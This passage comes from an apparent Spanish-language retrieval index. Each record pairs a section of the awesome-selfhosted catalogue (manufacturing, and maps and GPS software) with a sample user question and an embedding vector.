-0.0776, -0.18984, 0.06998, -0.00932, 0.01945, 0.12966, 0.08046, 0.03202, -0.02705, -0.0013, -0.00194, 0.08597, 0.03973, -0.06401, -0.01271, -0.12584, 7e-05, 0.21033, -0.06845, 0.11342, -0.07908, 0.03918, -0.09625, -0.05546, -0.04813, -0.03733, 0.03135, 0.00382, -0.11925, -0.06088, 0.02693, -0.01766, -0.14875, -0.00959, 0.0652, -0.06628, 0.05888, -0.16016, 0.04381, 0.02299, -0.07087, -0.08258, 0.0013, -0.02473, -0.04159, 0.0258, -0.04324, 0.08098, -0.08338, 0.00146, 0.06772, 0.0801, -0.11613, -0.06373, -0.0185, -0.07493, -0.01515, 0.01806, 0.01497, 0.00897, -0.07629, -0.0576, -0.02176, 0.04192, 0.05318, 0.01032, -0.00121, 0.12604, -0.03203, 0.06708, 0.05331, 0.0673, 0.01636, 0.1011, -0.01167, -0.08328, 0.11518, -0.06332, 0.11955, 0.16302, -0.01731, -0.07322, 0.03726, -0.01465, 0.02761, -0.0332, -0.05249, -0.04935, 0.03249, 0.02998, 0.02714, -0.00811, -0.11083, -0.01076, 0.08354, 0.0089, -0.02757, 0.08366, 0.04782, -0.02952, 0.10253, -0.06728, -0.0237, 0.02041, -0.03097, -0.04166, 0.01583, -0.00791, -0.05103, 0.0583, -0.08022, -0.03948, -0.02891, -0.02418, 0.07329, -0.04502, -0.02965, 0.05663, -0.08521, -0.02316, -0.03604, 0.00797, 0.00234, 0.07951, 0.01554, 0.03736, 0.02301, -0.03574, 0.01336, -0.01471, 0.00927, -0.06377, 0.01015, -0.07404, 0.00207, -0.05738, -0.04472, 0.02054, 0.05313, -0.0499, 0.08259, 0.01983, 0.04365, -0.01381, 0.06891, 0.08476, 0.00808, -0.00471, 0.01115, 0.04154, -0.0584, 0.06924, -0.02085, -0.04475, 0.06335, 0.07092, -0.0054, -0.02253, -0.00393, -0.01113, 0.03603, -0.00065, 0.01796, 0.03319, 0.00277, -0.04569, -0.06601, 0.05626, 0.03783, -0.02369, 0.0601, 0.04936, -0.02904, -0.04492, 0.01058, -0.00466, 0.01117, -0.00301, 0.10086, 0.0545, -0.06355, 0.01555, 0.03501, 0.06509, 0.01172, -0.00464, -0.01346, -0.02907, 0.01021, -0.0297, 0.01937, -0.01127, -0.00066, 0.05881, -0.10492, 0.01887, 0.0443, -0.01077, -0.09342, 0.02505, 0.0759, 0.09343, 0.00976, 0.00628, -0.05398, 0.0361, -0.00941, 0.01848, -0.0141, 0.03112, -0.04158, -0.00618, -0.03261, -0.02673, 0.05261, 0.02821, -0.05118, -0.04208, 0.00095, -0.02272, -0.04725, -0.04542, 0.03298, -0.01003, -0.0094, -0.00229, -0.02837, -0.04228, 0.06298]} +{"tipo": "pregunta", "herramienta": "Manufacturing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Manufacturing", "tema": "manufacturing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Manufacturing: CNCjs β€” Web interface for CNC milling controllers running Grbl, Smoothieware, or TinyG [MIT, Nodejs]. Fluidd β€” Lightweight & responsive user interface for Klipper, the 3D printer firmware [GPL-3.0, Docker/Nodejs]. LinuxCNC β€” Linux based CNC machine controller. It can drive milling machines, lathes, 3D printers, laser cutters, plasma cutters, robot arms, hexapods, and more [GPL-2.0/LGPL-3.0, C/deb]. Mainsail β€” Modern and responsive user interface for the Klipper 3D printer firmware. Control and monitor your printer from everywhere, from any device [GPL-3.0, Docker/Python]. Manyfold β€” Digital asset manager for 3d print files; STL, OBJ, 3MF and more [MIT, Docker]. Octoprint β€” Snappy web interface for controlling consumer 3D printers [AGPL-3.0, Docker/Python].", "indexar": "cual es una alternativa libre a Klipper para mi impresora 3D?", "v": [0.03317, -0.07813, -0.10351, -0.00508, -0.03145, -0.11231, -0.05676, 0.09271, -0.12419, -0.09105, 0.06013, -0.17552, -0.00159, -0.11546, 0.00616, -0.15653, -0.05934, -0.11541, 0.14381, -0.00498, -0.08674, 0.12327, -0.09896, -0.13593, -0.05852, 0.00888, 0.00307, 0.12422, -0.231, -0.00169, -0.02092, 0.07698, 0.04374, -0.05883, -0.06381, -0.06278, 0.05675, 0.11232, 0.06505, -0.00704, 0.07914, 0.05572, -0.05465, 0.02716, 0.00012, -0.0565, 0.03395, 0.11525, -0.11231, 0.16035, -0.09307, -0.00836, 0.01341, 0.09791, -0.0281, -0.04445, 0.08284, -0.06788, -0.08127, 0.08798, 0.01249, -0.02496, -0.04221, -0.02298, -0.11594, -0.05686, -0.05851, -0.06142, -0.03185, 0.05104, -0.01258, -0.01522, 0.05698, -0.06628, -0.03491, -0.01003, -0.08004, -0.01924, 0.00073, 0.05116, -0.01069, -0.0402, 0.02854, -0.0927, 0.00262, -0.10044, 0.04317, -0.00698, -0.07191, 0.01039, -0.02804, 0.0462, 0.05063, 0.06962, -0.05944, -0.12331, -0.038, 0.14649, -0.02743, 0.05945, 0.05102, 0.06415, -0.12817, 0.01792, -0.0031, -0.06112, 0.00717, 0.09671, -0.09006, -0.03079, 0.03531, 0.14832, 0.04931, 0.05974, -0.04901, -0.121, 0.01231, -0.00758, 0.05091, -0.0011, 0.03442, 0.04282, 0.00106, -0.06684, 0.03721, 0.04423, 0.0028, 0.04746, -0.11639, 0.02223, 0.0046, -0.02778, 0.00209, -0.13941, -0.03205, -0.08809, 0.03261, -0.03553, -0.0065, 0.02155, 0.01505, -0.00991, 0.04874, -0.06193, -0.02372, -0.0896, 0.03685, -0.01826, -0.03343, 0.00975, -0.09212, -0.0194, -0.01513, 0.08366, -0.02292, 0.0566, 0.04055, -0.06125, -0.00318, 0.04353, -0.0279, -0.00431, 0.02009, -0.0043, 0.02658, 0.03839, -0.03819, 0.00553, -0.06551, 0.05016, -0.00424, -0.04557, 0.04973, -0.04399, 0.03866, -0.03872, 0.03304, -0.03229, -0.01022, -0.00122, -0.00165, 0.08736, -0.05345, -0.01213, -0.00545, -0.04515, 0.0111, 0.05007, 0.05565, -0.02902, 0.04455, -0.01064, -0.11091, -0.11767, 0.06846, -0.06727, 0.0261, -0.1006, 0.00078, -0.06888, -0.03221, 0.03258, -0.0612, -0.02588, -0.02032, 0.01097, -0.0244, 0.02772, -0.01596, 0.00265, 0.01119, 0.06566, 0.03113, -0.00529, 0.02025, -0.00439, 0.02529, -0.02046, 0.01346, -0.00978, 0.12438, 0.01665, 0.00444, -0.03394, -0.00657, -0.02676, 0.08597, -0.06177, -0.04385, -0.02306, 0.00414, 0.10922, 0.00587, 0.01934, -0.01369, -0.02548, 0.04325, -0.00788, -0.00379, -0.11242, 0.03799, 0.0605, -0.0333, -0.00878, -0.00805, 0.07964, -0.02823, -0.05328, -0.06504, -0.09932, 0.01414, 0.05966, -0.00293, 0.03836, 0.06373, -0.0214]} +{"tipo": "pregunta", "herramienta": "Manufacturing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Manufacturing", "tema": "manufacturing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Manufacturing: CNCjs β€” Web interface for CNC milling controllers running Grbl, Smoothieware, or TinyG [MIT, Nodejs]. Fluidd β€” Lightweight & responsive user interface for Klipper, the 3D printer firmware [GPL-3.0, Docker/Nodejs]. LinuxCNC β€” Linux based CNC machine controller. It can drive milling machines, lathes, 3D printers, laser cutters, plasma cutters, robot arms, hexapods, and more [GPL-2.0/LGPL-3.0, C/deb]. Mainsail β€” Modern and responsive user interface for the Klipper 3D printer firmware. Control and monitor your printer from everywhere, from any device [GPL-3.0, Docker/Python]. Manyfold β€” Digital asset manager for 3d print files; STL, OBJ, 3MF and more [MIT, Docker]. Octoprint β€” Snappy web interface for controlling consumer 3D printers [AGPL-3.0, Docker/Python].", "indexar": "con que puedo montar un gestor digital para mis archivos de impresiΓ³n 3D como STL y OBJ?", "v": [0.00759, -0.17623, -0.11754, -0.10233, -0.1338, 0.02331, -0.10205, 0.04444, -0.07449, -0.03839, 0.02083, -0.09411, 0.14414, -0.13237, -0.02226, -0.01033, 0.05508, -0.17971, -0.06496, -0.0495, 0.05695, 0.08684, 0.11152, -0.16262, 0.03818, 0.0357, -0.00265, 0.0046, -0.25576, 0.11091, -0.01424, 0.02204, 0.04464, -0.07539, 0.01484, -0.09411, -0.0214, 0.14331, -0.03419, 0.06618, 0.03486, 0.01445, -0.00708, 0.19967, 0.0892, -0.01782, 0.12743, 0.06136, -0.03296, 0.00213, -0.06728, 0.00203, -0.12557, 0.13837, -0.08064, -0.01897, 0.0838, -0.12115, 0.13523, -0.00351, 0.00752, 0.07701, -0.07414, 0.02705, -0.0579, 0.02647, 0.00924, 0.03348, -0.13289, 0.0073, 0.04239, -0.00792, -0.03141, -0.04094, -0.02353, 0.04585, 0.00488, 0.01838, 0.04874, -0.08298, -0.02386, -0.04648, 0.05675, 0.05383, -0.05851, -0.07381, -0.0514, -0.14223, -0.08421, -0.07097, 0.01126, -0.02813, 0.02787, -0.08125, -0.03091, -0.07684, 0.09561, 0.05753, -0.03167, 0.03978, -0.09368, 0.0304, -0.03249, 0.06708, 0.01499, 0.05884, -0.01162, 0.01891, 0.08295, -0.00097, 0.02093, 0.06376, 0.03304, 0.09577, -0.08914, -0.04341, 0.11654, 0.01728, 0.0423, -0.01602, 0.05406, -0.04267, 0.05214, 0.02073, 0.0795, 0.00543, 0.07144, 0.06201, -0.12869, -0.03487, 0.03455, 0.01357, -0.03345, -0.01656, -0.03542, 0.05343, -0.0209, -0.00451, -0.0269, -0.05259, 0.00355, -0.01284, 0.09609, -0.01076, 0.02315, -0.0282, 0.0536, -0.07006, -0.06568, 0.01338, -0.02, 0.03485, 0.07292, 0.02487, -0.01815, 0.01328, 0.02279, -0.10674, -0.0332, 0.08059, -0.09921, -0.00631, 0.01594, 0.01079, -0.01153, -0.02414, -0.08168, 0.0202, 0.01339, -0.01444, -0.03295, -0.03639, -0.00854, -0.04658, 0.05099, 0.00758, -0.05853, -0.04095, 0.04243, -0.00089, -0.08583, -0.01993, 0.02192, 0.03746, -0.00587, -0.02771, 0.06162, 0.02185, 0.01898, 0.02081, 0.11055, 0.01836, -0.10292, 0.0051, 0.09897, -0.12983, -0.01714, 0.0452, 0.00165, -0.02337, 0.00284, -0.00534, -0.0283, -0.00938, -0.00403, -0.01966, -0.02376, 0.08107, 0.02649, -0.00481, 0.02028, -0.03422, 0.05997, -0.03385, 0.04123, -0.03429, 0.0218, 0.00727, -0.02018, 0.01149, 0.07681, 0.00944, 0.03442, -0.04498, 0.03701, -0.03206, 0.00269, -0.05686, -0.01029, -0.05588, -0.01865, 0.07853, -0.00403, 0.03258, 0.01112, 0.07881, 0.05205, 0.02204, -0.07479, -0.04894, -0.00015, 0.05063, 0.0298, 0.02947, -0.01906, -0.00069, -0.06372, -0.01221, -0.03268, -0.0514, -0.00182, 0.03501, -0.0364, 0.04584, 0.0059, -0.01914]} +{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): AdventureLog β€” Travel tracker and trip planner [GPL-3.0, Docker]. AirTrail β€” Personal flight tracking system [GPL-3.0, Docker/Nodejs]. Bicimon β€” Bike Speedometer as Progressive Web App [MIT, Javascript]. Dawarich β€” Visualize your location history, track your movements, and analyze your travel patterns with complete privacy and control (alternative to Google Timeline a.k.a. Google Location History) [AGPL-3.0, Docker]. Geo2tz β€” Get the timezone from geo coordinates (lat, lon) [MIT, Go/Docker]. GraphHopper β€” Fast routing library and server using OpenStreetMap [Apache-2.0, Java]. NextGIS Web β€” Web GIS server for geospatial data management, web map publishing, and QGIS-centered collaborative workflows [GPL-3.0, Docker]. Nominatim β€” Server application for geocoding (address -> coordinates) and reverse geocoding (coordinates -> address) on OpenStreetMap data [GPL-2.0, C].", "indexar": "quΓ© programa puedo usar para rastrear mis viajes y planificar aventuras de forma privada?", "v": [0.24507, 0.06472, -0.12593, -0.09699, 0.06343, 0.03518, 0.08843, -0.12699, -0.08736, -0.17679, 0.02172, -0.06226, -0.04338, 0.04126, 0.05766, 0.03085, 0.12849, 0.06588, 0.12468, 0.02959, -0.01686, -0.06708, -0.04, -0.01922, -0.09992, -0.0244, 0.12034, -0.0716, -0.09109, -0.05465, -0.0546, 0.15439, 0.10905, -0.07483, 0.00172, -0.02886, 0.10123, -0.02215, -0.00916, -0.01682, 0.00733, -0.03242, -0.00563, 0.10651, 0.02439, -0.04334, -0.0748, -0.06101, -0.05763, -0.05229, 0.00829, 0.01234, -0.07635, 0.04036, 0.17765, -0.04107, 0.08223, -0.10529, -0.03374, 0.03773, -0.02969, -0.02022, 0.01989, 0.10019, 0.08863, -0.06452, 0.09209, -0.04023, -0.10184, -0.01091, -0.05734, 0.06873, 0.02869, 0.02947, 0.01135, 0.01726, 0.05268, 0.02511, 0.09557, 0.02424, 0.02095, -0.00134, -0.04101, 0.06191, -0.09353, -0.05162, 0.12955, -0.00726, 0.06811, -0.00485, -0.03783, 0.02203, -0.02833, 0.03525, -0.06858, 0.01977, 0.16156, 0.05798, 0.03919, 0.08362, 0.01499, -0.03266, -0.04487, 0.2001, -0.12173, 0.11036, 0.06126, -0.01428, -0.02801, 0.06419, -0.01555, 0.04329, -0.05069, -0.06115, -0.0697, -0.03843, -0.06633, -0.05258, 0.05788, -0.10041, -0.10817, 0.0419, 0.00114, 0.03156, 0.09624, 0.0239, -0.059, 0.1046, -0.02437, 0.01707, -0.00018, 0.00769, -0.00837, -0.01335, 0.00629, -0.02507, -0.02963, 0.02481, 0.07286, -0.01741, 0.04593, 0.00044, -0.02381, -0.03335, 0.02146, 0.05047, 0.01348, -0.04736, -0.03649, 0.05046, -0.00872, 0.0792, 0.04468, 0.07628, 0.02078, 0.01402, 0.00391, -0.06815, -0.05406, 0.10098, -0.00075, 0.03144, -0.0138, -0.0054, 0.14569, -0.11071, 0.01535, -0.07666, 0.02096, 0.0534, -0.01699, 0.0347, 0.06848, -0.12013, 0.07904, -0.0238, -0.05007, -0.02167, 0.01761, -0.0351, -0.06867, 0.03623, 0.01567, -0.00393, -0.04336, -0.03835, -0.00835, -0.0075, 0.03986, -0.00421, 0.00957, 0.04563, 0.06298, 0.01635, -0.01393, -0.07931, 0.0137, -0.00046, 0.00597, -0.05699, 0.02167, -0.03444, -0.03107, -0.0147, 0.06421, 0.04444, -0.07438, 0.06022, 0.01548, 0.13082, 0.06162, -0.06584, 0.06948, -0.05218, -0.03967, 0.05461, -0.01276, 0.0221, 0.03537, 0.05273, -0.00057, 0.08499, 0.02576, 0.01684, 0.08246, -0.01185, 0.02906, 0.00481, 0.02315, 0.04661, 0.00588, 0.0007, -0.05177, -0.01479, 0.00503, 0.02773, 0.04046, -0.01502, -0.04436, -0.02574, -0.00728, 0.07582, 0.00099, -0.02162, -0.02192, -0.02906, -0.06457, 0.10085, 0.02921, -0.06766, 0.00047, 0.05589, 0.10222, -0.04979, 0.03007, -0.00114]} +{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): AdventureLog β€” Travel tracker and trip planner [GPL-3.0, Docker]. AirTrail β€” Personal flight tracking system [GPL-3.0, Docker/Nodejs]. Bicimon β€” Bike Speedometer as Progressive Web App [MIT, Javascript]. Dawarich β€” Visualize your location history, track your movements, and analyze your travel patterns with complete privacy and control (alternative to Google Timeline a.k.a. Google Location History) [AGPL-3.0, Docker]. Geo2tz β€” Get the timezone from geo coordinates (lat, lon) [MIT, Go/Docker]. GraphHopper β€” Fast routing library and server using OpenStreetMap [Apache-2.0, Java]. NextGIS Web β€” Web GIS server for geospatial data management, web map publishing, and QGIS-centered collaborative workflows [GPL-3.0, Docker]. Nominatim β€” Server application for geocoding (address -> coordinates) and reverse geocoding (coordinates -> address) on OpenStreetMap data [GPL-2.0, C].", "indexar": "con quΓ© puedo visualizar mi historial de ubicaciΓ³n y analizar mis patrones de movimiento?", "v": [0.09299, 0.17014, -0.13244, -0.1029, -0.00533, 0.01551, -0.02058, -0.0283, -0.17302, -0.1213, 0.02578, -0.02496, 0.07096, 0.07976, 0.13508, -0.02018, 0.12816, -0.00995, 0.03859, -0.00058, -0.07673, -0.03911, 0.01268, 0.05493, -0.02704, -0.02451, 0.04225, -0.00273, -0.13335, -0.08221, -0.01794, 0.06378, 0.00678, -0.05421, 0.0894, -0.05518, -0.02987, 0.07414, -0.05423, -0.02492, -0.10469, -0.07309, -0.08016, -0.00469, -0.00162, -0.0981, -0.14781, -0.01822, -0.15288, 0.00253, 0.06056, 0.10767, -0.08574, -0.00298, 0.07567, -0.05472, 0.06296, 0.09527, 0.09019, -0.00364, 0.01478, 0.03802, -0.00038, 0.01523, 0.09151, -0.12581, 0.04038, -0.00853, -0.08226, -0.02635, -0.08243, 0.00186, -0.08789, 0.03658, 0.01149, 0.07292, 0.06544, 0.01674, -0.01224, 0.10611, -0.00552, 0.03354, -0.09617, 0.09051, -0.08047, -0.00266, -0.03816, -0.07035, 0.05526, -0.08727, 0.04339, -0.01057, -0.04475, 0.08772, -0.04886, 0.06355, 0.00197, 0.00141, -0.00443, 0.06286, 0.03123, 0.00759, -0.0621, 0.10498, 0.14931, 0.03584, 0.05499, -0.07139, -0.07118, -0.06099, -0.00958, -0.04977, -0.05014, -0.02436, -0.04396, -0.07512, -0.16099, 0.02876, -0.07332, -0.04841, -0.00957, 0.0121, -0.01607, -0.06756, -0.06902, 0.08391, 0.03597, 0.06106, 0.01871, 0.04814, 0.04335, 0.06553, -0.04083, -0.02177, -0.00784, 0.0288, -0.02076, 0.02593, 0.09031, -0.06719, 0.04643, 0.03086, -0.00111, 0.02862, 0.09176, 0.01467, 0.00864, -0.01203, -0.13273, 0.02967, -0.09876, 0.02392, 0.02582, 0.01805, 0.03876, 0.0096, 0.00732, -0.08966, -0.04149, -0.02783, 0.0189, 0.00891, -0.05432, -0.0346, 0.06634, -0.07364, -0.02389, -0.05123, 0.06895, -0.03361, -0.05189, -0.00281, -0.09042, -0.0316, 0.05199, -0.04083, -0.03636, -0.04024, 0.06826, -0.02832, -0.03426, 0.02117, 0.02678, -0.02734, -0.0317, -0.03599, 0.04569, 0.03698, 0.0463, 0.07185, 0.0789, -0.00874, 0.04925, -0.02312, -0.04217, -0.07314, -0.04381, -0.0432, 0.04781, 0.02227, -0.06556, -0.01687, 0.02018, 0.00626, 0.04754, 0.05784, -0.05002, 0.06318, -0.00907, 0.01932, 0.01498, -0.03249, 0.12476, -0.0439, -0.10079, 0.00332, 0.0572, 0.0042, -0.01709, -0.00198, 0.0184, 0.09512, 0.12004, -0.04046, -0.01139, -0.03551, 0.04475, 0.01691, 0.06985, 0.03283, -0.03917, 0.12204, -0.05544, -0.02992, 0.02084, 0.07533, 0.05885, -0.12654, -0.07536, -0.07392, 0.07825, 0.09777, -0.03407, -0.04506, 0.04132, -0.09264, -0.09389, 0.08004, -0.02822, -0.06437, -0.01239, 0.03535, 0.09129, -0.06349, 0.07585, -0.00911]} +{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): AdventureLog β€” Travel tracker and trip planner [GPL-3.0, Docker]. AirTrail β€” Personal flight tracking system [GPL-3.0, Docker/Nodejs]. Bicimon β€” Bike Speedometer as Progressive Web App [MIT, Javascript]. Dawarich β€” Visualize your location history, track your movements, and analyze your travel patterns with complete privacy and control (alternative to Google Timeline a.k.a. Google Location History) [AGPL-3.0, Docker]. Geo2tz β€” Get the timezone from geo coordinates (lat, lon) [MIT, Go/Docker]. GraphHopper β€” Fast routing library and server using OpenStreetMap [Apache-2.0, Java]. NextGIS Web β€” Web GIS server for geospatial data management, web map publishing, and QGIS-centered collaborative workflows [GPL-3.0, Docker]. Nominatim β€” Server application for geocoding (address -> coordinates) and reverse geocoding (coordinates -> address) on OpenStreetMap data [GPL-2.0, C].", "indexar": "cual es una alternativa libre a Google Timeline para seguir mis desplazamientos?", "v": [0.0049, 0.10727, -0.03304, 0.00634, -0.10315, -0.03425, -0.09013, 0.04303, -0.0446, 0.01706, -0.06599, -0.11518, -0.02698, 0.05514, 0.09025, -0.05699, 0.0336, -0.08879, 0.07271, -0.01727, -0.12647, 0.053, -0.02524, -0.16283, 0.01234, -0.01606, -0.06876, -0.04246, -0.10571, -0.05815, -0.05248, -0.02329, -0.08091, -0.02351, -0.07037, 0.01608, 0.0904, 0.06891, 0.0635, -0.1461, -0.01701, -0.07449, -0.11045, 0.13418, -0.15601, -0.13163, -0.00667, 0.07971, -0.08019, -0.0369, -0.04682, 0.06335, -0.04539, 0.06922, 0.08545, 0.06006, 0.21176, -0.15936, -0.13608, -0.03936, -0.08867, -0.03606, 0.08185, 0.04482, 0.07796, 0.02489, 0.04414, 0.05503, -0.14992, 0.07718, -0.01148, -0.06842, 0.00797, -0.02399, -0.05442, 0.05804, -0.00077, 0.05222, 0.00974, 0.08352, 0.10222, -0.01024, -0.04814, 0.0508, -0.07172, -0.10171, 0.1257, -0.10334, -0.00543, 0.09589, 0.05031, 0.06502, -0.06491, 0.14671, -0.03498, -0.01271, 0.03392, -0.05155, 0.0472, 0.05815, 0.08364, 0.03985, -0.04093, -0.04486, -0.0361, 0.01324, 0.01952, 0.05471, -0.09691, 0.01905, -0.02781, -0.03537, 0.0288, -0.03075, 0.05614, 0.04969, -0.00016, 0.08375, -0.04153, -0.04035, -0.02562, -0.06247, -0.14645, -0.10255, 0.01408, 0.06961, 0.03571, 0.00293, -0.00131, -0.10407, 0.07162, -0.04624, -0.00381, -0.05329, -0.07967, 0.08633, 0.06754, 0.00628, 0.08345, -0.04592, 0.03886, -0.06173, 0.00169, -0.07262, 0.02616, -0.02291, 0.05451, -0.04795, -0.06908, -0.1006, -0.09088, -0.01277, -0.00381, 0.07263, 0.0028, 0.05138, -0.12104, 0.02869, -0.10598, -0.00161, 0.00916, -0.02483, 0.05387, -0.04654, 0.04817, -0.04389, 0.04835, 0.03379, -0.06413, -0.01752, -0.01129, 0.06689, 0.07459, -0.07124, 0.00326, -0.05241, -0.01899, -0.01237, 0.02517, -0.00721, -0.01332, 0.12283, 0.05616, -0.0313, 0.00736, -0.1041, 0.01413, -0.02614, -0.03226, 0.06379, -0.04586, 0.01208, 0.04678, -0.01927, -0.006, -0.05693, -0.01872, -0.08051, 0.03882, 0.00561, -0.06275, -0.05562, 0.05967, 0.05358, -0.07856, 0.01153, 0.04979, 0.02343, -0.04108, 0.02462, 0.05782, -0.00297, 0.0476, 0.04381, -0.06258, -0.02669, 0.01316, -0.04739, -0.01273, -0.02122, 0.03321, 0.05436, 0.00316, -0.00502, -0.08703, 0.02148, 0.0567, 0.01818, -0.04478, -0.02694, 0.0366, 0.00768, 0.00033, -0.01306, 0.03678, 0.0051, 0.02803, 0.00225, 0.01488, 0.02614, 0.02395, 0.04957, -0.07972, 0.05931, -0.05044, -0.01054, -0.06301, -0.01589, 0.01856, -0.07379, -0.04881, 0.02968, 0.04978, 0.01204, 0.03357, 0.0106]} +{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Open Source Routing Machine (OSRM) β€” High performance routing engine designed to run on OpenStreetMap data and offering an HTTP API, C++ library interface, and Nodejs wrapper [BSD-2-Clause, C++]. OpenRouteService β€” Route service with directions, isochrones, time-distance matrix, route optimization, etc [GPL-3.0, Docker/Java]. OpenStreetMap β€” Collaborative project to create a free editable map of the world [GPL-2.0, Ruby]. OpenTripPlanner β€” Multimodal trip planning software based on OpenStreetMap data and consuming published GTFS-formatted data to suggest routes using local public transit systems [LGPL-3.0, Java/Javascript]. OwnTracks Recorder β€” Store and access data published by [OwnTracks](https://owntracks.org/) location tracking apps [⚠, GPL-2.0, C/Lua/deb/Docker]. TileServer GL β€” Vector and raster maps with GL styles. Server side rendering by Mapbox GL Native. Map tile server for Mapbox GL JS, Android, iOS, Leaflet, OpenLayers, GIS via WMTS, etc [BSD-2-Clause, Nodejs/Docker].", "indexar": "que programa sirve para planificar viajes combinando transporte pΓΊblico y rutas en coche?", "v": [0.19331, 0.02269, -0.17616, -0.12686, 0.09036, -0.08806, 0.09886, -0.01771, 0.00517, -0.2009, -0.05475, -0.06355, 0.01939, 0.06524, 0.0247, -0.0294, 0.03878, -0.04341, 0.10561, -0.04454, 0.01105, -0.04256, 0.02372, 0.01278, -0.01929, 0.01259, 0.12669, -0.04831, -0.11518, -0.03299, 0.03118, 0.06899, 0.09926, -0.0678, 0.0127, -0.10002, 0.03065, 0.05921, -0.01977, -0.14804, 0.02303, -0.06247, -0.07975, 0.07141, 0.01398, -0.02297, -0.03842, -0.0842, -0.08432, -0.06841, 0.00734, 0.02034, -0.00263, 0.00462, 0.12072, 0.00283, 0.01885, -0.06387, -0.11418, 0.03332, 0.0961, -0.04217, 0.00768, 0.08942, 0.13029, -0.00375, 0.1134, -0.00803, -0.04382, -0.10366, -0.08408, 0.02077, 0.10761, 0.01411, -0.0205, -0.00883, 0.03501, 0.11473, 0.05144, 0.04534, 0.16934, 0.01939, -0.10435, 0.03867, 0.02149, 0.02871, 0.16308, -0.0139, 0.03274, 0.16979, -0.07617, -0.0118, 0.06381, 0.04594, -0.06152, 0.06394, 0.09484, 0.00092, 0.09414, 0.00133, 0.0746, -0.07944, -0.01633, 0.06226, -0.1371, 0.1248, 0.14295, -0.0629, 0.04438, 0.10319, 0.049, 0.00831, 0.03239, -0.11308, -0.01636, -0.04812, 0.02295, 0.01143, 0.0232, -0.10239, -0.10021, 0.05636, -0.00882, 0.00151, 0.03518, 0.00228, -0.05344, 0.10745, -0.01178, -0.0105, 0.0618, 0.10418, -0.02868, -0.04685, -0.06332, -0.00299, 0.0119, 0.03915, 0.06275, -0.02685, 0.11012, 0.06785, -0.01444, -0.03659, -0.00709, 0.01248, -0.00908, -0.01217, -0.03771, 0.04834, -0.00524, -0.05036, -0.0108, 0.04107, 0.04698, 0.03929, -0.00936, -0.05356, -0.05126, 0.04714, -0.03439, -0.01972, -0.01436, 0.01841, 0.08215, -0.05636, -0.01981, -0.08603, 0.08229, -0.02104, 0.05216, -0.00521, 0.07413, -0.09706, -0.01976, -0.01216, -0.04057, -0.02749, 0.02606, 0.06105, -0.09534, -0.02622, -0.01617, 0.03769, -0.02926, 0.01006, -0.03707, 0.01447, 0.06336, -0.07297, -0.06887, 0.01829, 0.04824, 0.01416, 0.00391, -0.04165, -0.01983, -0.03302, 0.05243, 0.0243, -0.04888, -0.02186, 0.00032, -0.05905, 0.05485, 0.03987, -0.02819, 0.04333, 0.03533, 0.13608, 0.01922, -0.07805, 0.06219, -0.07853, 0.0139, -0.01006, -0.01242, 0.01426, 0.03523, 0.08627, 0.0198, 0.01754, -0.03934, -0.00025, 0.0379, 0.03008, 0.02949, 0.01719, 0.06454, 0.00177, 0.02573, -0.02098, -0.01069, 0.00291, 0.00852, 0.03651, 0.01056, -0.01038, -0.09771, -0.03537, 0.01462, 0.07356, -0.02952, -0.05809, -0.0397, -0.03109, -0.03649, 0.03437, 0.05986, -0.04875, 0.01245, 0.08028, 0.03459, -0.00512, 0.0247, -0.047]} +{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Open Source Routing Machine (OSRM) β€” High performance routing engine designed to run on OpenStreetMap data and offering an HTTP API, C++ library interface, and Nodejs wrapper [BSD-2-Clause, C++]. OpenRouteService β€” Route service with directions, isochrones, time-distance matrix, route optimization, etc [GPL-3.0, Docker/Java]. OpenStreetMap β€” Collaborative project to create a free editable map of the world [GPL-2.0, Ruby]. OpenTripPlanner β€” Multimodal trip planning software based on OpenStreetMap data and consuming published GTFS-formatted data to suggest routes using local public transit systems [LGPL-3.0, Java/Javascript]. OwnTracks Recorder β€” Store and access data published by [OwnTracks](https://owntracks.org/) location tracking apps [⚠, GPL-2.0, C/Lua/deb/Docker]. TileServer GL β€” Vector and raster maps with GL styles. Server side rendering by Mapbox GL Native. Map tile server for Mapbox GL JS, Android, iOS, Leaflet, OpenLayers, GIS via WMTS, etc [BSD-2-Clause, Nodejs/Docker].", "indexar": "cual es una alternativa libre a Google Maps para calcular distancias y tiempos de viaje?", "v": [0.07413, 0.08893, -0.09818, -0.04354, -0.09828, -0.0238, 0.03403, 0.06663, -0.02827, -0.00566, 0.00856, -0.19042, -0.02422, 0.08862, 0.10497, -0.01006, 0.1249, -0.03485, 0.08042, -0.05076, -0.00646, -0.03123, -0.0713, -0.11092, -0.09201, 